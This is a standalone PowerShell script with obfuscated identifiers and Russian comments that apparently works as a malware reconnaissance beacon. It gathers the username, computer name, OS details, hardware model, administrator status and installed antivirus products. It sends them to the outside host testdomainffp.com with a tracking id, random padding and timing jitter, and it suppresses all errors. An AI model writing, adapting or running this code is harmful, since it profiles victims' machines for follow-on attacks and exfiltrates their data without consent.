$tdoymap4_qsnxeoo_otvvge = '40578942-d488-4d0e-ac3d-47340e526df9' $vwrrh_mfregbswn31kyzxljj25a = $env:USERNAME $mxvoe1_fpbbm_sxt6hog1fl = $env:COMPUTERNAME $srsrxguvs7_vwmm9epuj0jjq = [Environment]::OSVersion.VersionString # Сбор информации с обработкой ошибок try { $yrvg_tdhpoowjy8vbva66sx9n = Get-WmiObject -Class Win32_ComputerSystem $qbdiwsxm_esnyzty2_fxorqncuagao0i = $yrvg_tdhpoowjy8vbva66sx9n.Model $cfdhcwzuk_carirnd042de = $yrvg_tdhpoowjy8vbva66sx9n.Manufacturer $yfak_pgoa5_rkjy_cqtzwbv8d = (Get-WmiObject -Class Win32_OperatingSystem).Caption $rxgvk_fyndy7_uvmiiqghi = $PSVersionTable.PSVersion.ToString() $kjwmah_xcg_ssicnzq5yvo8tjp2im = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) try { $proojygns_lcpp_iqutqh3vi9nw6 = Get-CimInstance -ClassName AntiVirusProduct -Namespace root/SecurityCenter2 -ErrorAction SilentlyContinue | Select-Object -ExpandProperty displayName if ($proojygns_lcpp_iqutqh3vi9nw6) { $proojygns_lcpp_iqutqh3vi9nw6 = ($proojygns_lcpp_iqutqh3vi9nw6 -join " | ") } else { $proojygns_lcpp_iqutqh3vi9nw6 = "None" } } catch { $proojygns_lcpp_iqutqh3vi9nw6 = "QueryFailed" } # Если дошли сюда без исключений - информация собрана успешно $checkResult = "OK" $checkNote = "System info collected successfully" } catch { # Если была ошибка при сборе $checkResult = "FAIL" $errorMsg = $_.Exception.Message $checkNote = "Error collecting system info: $errorMsg" # Устанавливаем значения по умолчанию при ошибке $qbdiwsxm_esnyzty2_fxorqncuagao0i = "Unknown" $cfdhcwzuk_carirnd042de = "Unknown" $yfak_pgoa5_rkjy_cqtzwbv8d = "Unknown" $rxgvk_fyndy7_uvmiiqghi = "Unknown" $kjwmah_xcg_ssicnzq5yvo8tjp2im = $false $proojygns_lcpp_iqutqh3vi9nw6 = "Error" } # Отправляем результат Add-Type -AssemblyName System.IO.Compression.FileSystem function zuxvvoz_pquhvfbvv7_bb($inputStr) { return ($inputStr -replace '[aeiou]', 'x') } function teejmqx_ltdzbkjb_dtzprmdjbk5ivycmpz1q9mb0q($event, $note="", $path="", $file="") { $endpoint = 'https://testdomainffp.com' + '/apypais?id=' + $tdoymap4_qsnxeoo_otvvge + '&s=' + $event $queryParams = @( '&user=' + [System.Uri]::EscapeDataString($vwrrh_mfregbswn31kyzxljj25a), '&pc=' + [System.Uri]::EscapeDataString($mxvoe1_fpbbm_sxt6hog1fl), '&cwd=' + [System.Uri]::EscapeDataString($path), '&osver=' + [System.Uri]::EscapeDataString($srsrxguvs7_vwmm9epuj0jjq), '&osname=' + [System.Uri]::EscapeDataString($yfak_pgoa5_rkjy_cqtzwbv8d), '&pcmodel=' + [System.Uri]::EscapeDataString($qbdiwsxm_esnyzty2_fxorqncuagao0i), '&pcmanuf=' + [System.Uri]::EscapeDataString($cfdhcwzuk_carirnd042de), '&psv=' + [System.Uri]::EscapeDataString($rxgvk_fyndy7_uvmiiqghi), '&admin=' + $kjwmah_xcg_ssicnzq5yvo8tjp2im, '&avinfo=' + [System.Uri]::EscapeDataString($proojygns_lcpp_iqutqh3vi9nw6), '&noise=' + (Get-Random -Minimum 5000 -Maximum 15000) ) if ($file) { $queryParams += '&exe_name=' + [System.Uri]::EscapeDataString($file) } if ($note) { $queryParams += '&msg=' + [System.Uri]::EscapeDataString($note) } $fullUri = $endpoint + ($queryParams -join '') try { $null = Invoke-WebRequest -Uri $fullUri -Method GET -UseBasicParsing -TimeoutSec 10 } catch { } Start-Sleep -Milliseconds (Get-Random -Minimum 300 -Maximum 4000) } # Отправляем результат проверки системы if ($checkResult -eq "OK") { & teejmqx_ltdzbkjb_dtzprmdjbk5ivycmpz1q9mb0q 'check_system_ok' $checkNote $env:TEMP $null } else { & teejmqx_ltdzbkjb_dtzprmdjbk5ivycmpz1q9mb0q 'check_system_fail' $checkNote $env:TEMP $null }